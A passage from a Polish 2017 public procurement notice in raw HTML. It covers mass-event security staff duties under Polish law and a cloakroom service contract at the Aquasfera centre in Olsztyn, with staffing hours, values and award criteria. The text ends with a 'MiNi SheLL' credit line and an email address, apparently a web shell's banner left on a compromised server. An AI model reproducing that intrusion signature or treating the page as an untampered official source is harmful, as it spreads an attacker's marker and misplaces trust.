stroje z symbolem Firmy, legitymować się identyfikatorem zawierającym następujące informacje: nazwę wystawcy, numer identyfikacyjny i fotografię osoby dokonującej czynności związanej z zabezpieczeniem imprezy, okres ważności, pieczęć i podpis wystawcy. Posiadać odpowiednie wyposażenie zgodne z wymogami oraz środki łączności. Postępowanie służb zabezpieczenia powinno być oparte o instrukcję określającą zadania służb porządkowych i informacyjnych oraz warunki łączności pomiędzy podmiotami biorącymi udział w zabezpieczeniu: opracowane  na podstawie ustawy o bezpieczeństwie imprez masowych z dnia 20 marca 2009 r. (Dz. U. z 2013 r., poz. 611,628,829). 
Zakres obowiązków pracowników -  Służby porządkowej i informacyjnej:
 - Obserwacja dróg ewakuacyjnych, parkingu VIP oraz terenu przyległego;
 - Niedopuszczenie pojazdów nieuprawnionych do korzystania z drogi ewakuacyjnej  oraz  parkingu VIP;
- Umożliwienie swobodnego wjazdu i wyjazdu pojazdom uprzywilejowanym w pobliże  obiektu;
 - Interweniowanie w przypadku stwierdzenia zaboru mienia lub próby dewastacji mienia, naruszenia porządku publicznego;
 - Interweniowanie po stwierdzeniu dokonania kradzieży lub rozboju
 -  legitymowania osób w celu ustalenia ich tożsamości;
-  przeglądania zawartości bagażu osób, w przypadku podejrzenia, że osoby te wnoszą lub  posiadają broń lub inne niebezpieczne przedmioty, materiały wybuchowe, wyroby pirotechniczne, materiały pożarowo niebezpieczne, napoje alkoholowe, środki odurzające  lub substancje psychotropowe;
 -  stwierdzania uprawnień osób do przebywania na imprezie masowej, a w przypadku stwierdzenia braku takich uprawnień  wezwania ich do opuszczenia imprezy masowej;
 - wydawania poleceń porządkowych osobom zakłócającym porządek publiczny lub  zachowującym się niezgodnie z regulaminem imprezy masowej, a w przypadku niewykonania tych poleceń  wezwania ich do opuszczenia imprezy masowej;
- stosowania siły fizycznej w postaci chwytów obezwładniających oraz podobnych technik obrony w przypadku zagrożenia dóbr powierzonych ochronie lub odparcia ataku na członka służby porządkowej lub inną osobę na zasadach określonych w art. 38 ustawy z dnia 22 sierpnia 1997 r. o ochronie osób i mienia ( Dz.U. nr 114, poz. 740 z późń. zm.)
 - ujęcia w celu niezwłocznego przekazania Policji, osób stwarzających bezpośrednie zagrożenie dla życia lub zdrowia ludzkiego, a także chronionego mienia.
Powyższe czynności powinny być wykonywane w sposób możliwie najmniej naruszający godność ludzką oraz inne dobra osobiste osoby, w stosunku do której zostały podjęte. 
Ilość roboczogodzin może ulec zmianie  w zależności od ilości realizowanych imprez
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>79710000-4, 79711000-1,
                    75240000-0,
                    98390000-3<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  15000<br />
                  Waluta:
                  <br /><div style="padding-left: 20px">PLN<br /><b>4) Czas trwania lub termin wykonania: </b>
                      data rozpoczęcia: 01/01/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Doświadczenie osób - kierownik ds. bezpieczeństwa </td><td>20</td></tr><tr><td>Doświadczenie osób - pracownicy ochrony</td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>3
                  
                <b>Nazwa: </b>Część III zamówienia Serwis szatniowy - obsługa szatni głównej w WCRS<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Serwis szatniowy  obsługa szatni głównej w WCRS Aquasfera Galeria Warmińska, Olsztyn, ul. Piłsudskiego 69 b w 2017 r.
W okresie od 01.01.  31.12.2017 r. z podziałem na okres zimowy i letni
1) Okres zimowy: 01.01.-31.05.2017 i 01.10.-31.12.2017 (6495 osobogodzin)  dyżur pracowników ochrony  serwis szatniowy  obsługa szatni głównej  realizowane w następujący sposób: od poniedziałku do niedzieli (6125 osobogodzin) w godzinach 06.00-14.00 (8 godz.)  - 1 osoba; godz. 14.00  22.30 (8,5 godziny)  2 osoby i dodatkowo sobota i niedziela (370 osobogodzin) godz. 09.00-14.00 (5 godzin)  1 osoba
2)Okres letni  01.06-30.09.2017 (2013 osobogodzin) dyżur pracowników ochrony-serwis szatniowy - obsługa szatni głównej realizowany w następujący sposób: od poniedziałku do niedzieli (2013 osobogodzin) w godz. 06.00-14.00 -  (8 godz.) -  1osoba; w godz. 14.00  22.30 (8,5 godziny) - 1 osoba
Wykaz czynności do realizacji na stanowisku:
- odbieranie okryć wierzchnich i lekkich toreb od Klientów obiektu i wydawanie numerków szatniowych
- wydawanie rzeczy oddanych do depozytu i odbiór numerków
- informowanie Klientów o odbywających się imprezach i zajęciach na obiekcie
- informowanie Klientów i kierowanie w odpowiednie rejony obiektu
- utrzymywanie porządku na stanowisku pracy i w najbliższym sąsiedztwie
- współdziałanie z innymi służbami w przypadku zagrożenia
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>79710000-4, 79711000-1,
                    75240000-0,
                    98390000-3<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  93588<br />
                  Waluta:
                  <br /><div style="padding-left: 20px">PLN<br /><b>4) Czas trwania lub termin wykonania: </b>
                      data rozpoczęcia: 01/01/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Aspekty społeczne - zatrudnienie osób bezrobotnych</td><td>20</td></tr><tr><td>Aspekty społeczne - zatrudnienie osób niepełnosprawnych</td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com